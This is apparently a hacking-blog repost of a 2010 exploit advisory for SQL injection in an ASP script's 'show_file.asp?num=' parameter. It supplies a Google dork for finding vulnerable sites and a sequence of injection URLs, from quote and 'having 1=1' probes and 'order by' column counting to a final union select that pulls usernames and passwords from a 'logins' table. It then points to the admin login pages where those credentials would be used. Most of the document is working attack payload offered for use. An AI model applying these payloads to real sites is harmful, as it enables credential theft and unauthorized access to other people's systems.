Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates
ASP Exploitation SQL Injection Vulnerability
- =============================================
- ASP Exploitation SQL Injection Vulnerability
- =============================================
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
- 0 _ __ __ __ 1
- 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
- 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
- 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
- 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
- 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
- 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
- 1 \ \____/ >> Exploit database separated by exploit 0
- 0 \/___/ type (local, remote, DoS, etc.) 1
- 1 0
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
- #######################################################################
- #
- # Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
- #
- # Date: [ 2010-06-17 ] ..
- #
- # Author: [ SA H4x0r ] ..
- #
- # Version: [ Scripts((asp)) ] ..
- #
- # Google dork: [ show_file.asp?num= ] ..
- #
- # Email: [ ww0@hotmail.com ] ..
- #
- # From: Saudi Arabia ..
- #
- # Gr33t's: The Master|Al-Kaser20|v4-team|Mn7os|inj3ct0r|exploit-db ..
- #
- #category: [SQL Injecti0n] ..
- #
- #######################################################################
- # Exploit :
- http://[site]/path/show_file.asp?num={SQL}
- # Analysis:
- http://[site]/path/show_file.asp?num=Number
- union select ((Number)) login, ((Number)) from logins
- ========================================================================
- # Like:
- http://[site]/path/show_file.asp?num=50
- http://[site]/path/show_file.asp?num=50'
- http://[site]/path/show_file.asp?num=50 having 1=1
- ((')) <<<<< Keep the label to show a query site involved ..
- (( having 1=1 )) << Yes, this revealed the site involved ..
- ========================================================================
- # Like:1
- http://[site]/path/show_file.asp?num=50 order by 20
- union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins
- union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins
- union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins
- ========================================================================
- # Final:
- http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins
- The source of plaque control:-
- http://[site]/path/admin "OR" http://[site]/path/login
- cpanel: http://[site]/admin "OR" http://[site]/login
- ========================================================================
- ./done ..
This post was written by:
Adnan Anjum - who has written 1000+ posts on hackguide4u.
Adnan Anjum is a professional Geek. Follow him on Twitter or email him
Subscribe to:
Post Comments (Atom)
Share your views...
0 Respones to "ASP Exploitation SQL Injection Vulnerability"
Post a Comment